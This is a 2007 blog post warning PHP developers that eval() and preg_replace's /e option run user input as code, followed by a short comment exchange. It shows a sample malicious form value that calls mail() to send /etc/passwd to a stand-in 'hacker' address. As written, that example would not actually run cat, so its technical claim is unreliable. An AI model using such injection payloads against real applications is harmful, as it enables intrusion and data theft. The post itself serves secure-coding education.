Dec
22
PHP eval is evil
December 22, 2007 |
JSON creator Douglas Crockford more than once pointed out that: in JavaScript, eval is evil. Well in PHP, eval is also almost always evil (though some people say it can be useful in a few limited cases). I personally have no guts to use it. Allowing any user-supplied data to go into an eval( ) call is asking to be hacked.
eval( ) has aliases. Do not use the /e option with preg_replace( ), the preg_replace( ) function with the /e option also calls eval( ) on PHP code, especially if you use any user-entered data in the calls.
So what does eval do? In eval ( string $code_str ), eval evaluates the string given in code_str as PHP code. Imagine you get a form username input field value using eval($_POST['username']), if the hacker type the following value in the input field: mail("hacker@somewhere.com", "Some passwords", '/bin/cat /etc/passwd'). You will be sending your server password to the hacker.
So don’t use eval unless you are suicidal. ;)
Similar Posts
- Wordpress Mail Localhost
- Use Adsense for Search on WordPress
- Troubleshoot Flash PHP Can’t Upload Flv
- Flush DNS on Windows
- PHP - Display all jpg Image Infomation
- FileZilla 3.0.2.1 bug
- Flush DNS on Mac
- Download AI Format RSS Feed Icon Illustrator File
- Backup Export MySQL Database Using PHP
- Wikipedia Gallery
- JavaScript IDE - Aptana Studio 1.0
- Google Maps Satellite View is Gone
- Official QQ Linux Version is Released
- Google Chrome’s Quick Search Bar
- PHP cURL XAMPP
- PHP Random Password Generation
- PHP Find Absolute Path
Comments
2 Comments so far



































I find eval very helpful in varible setting examples, for example:
eval(’$this->debug =’ . (IS_PHP4 ? ‘&’ : ”) . ‘ new stdClass();’);
The only cases where eval is “evil” are whereyou’re inputting user data into eval - but you should be validating and sanitising any user input anyway.
Hi, Ross
in your case, it provides convenience and really helpful. What I mentioned in my post was more about the possible problems eval causes.
really appreciate your opinion. :)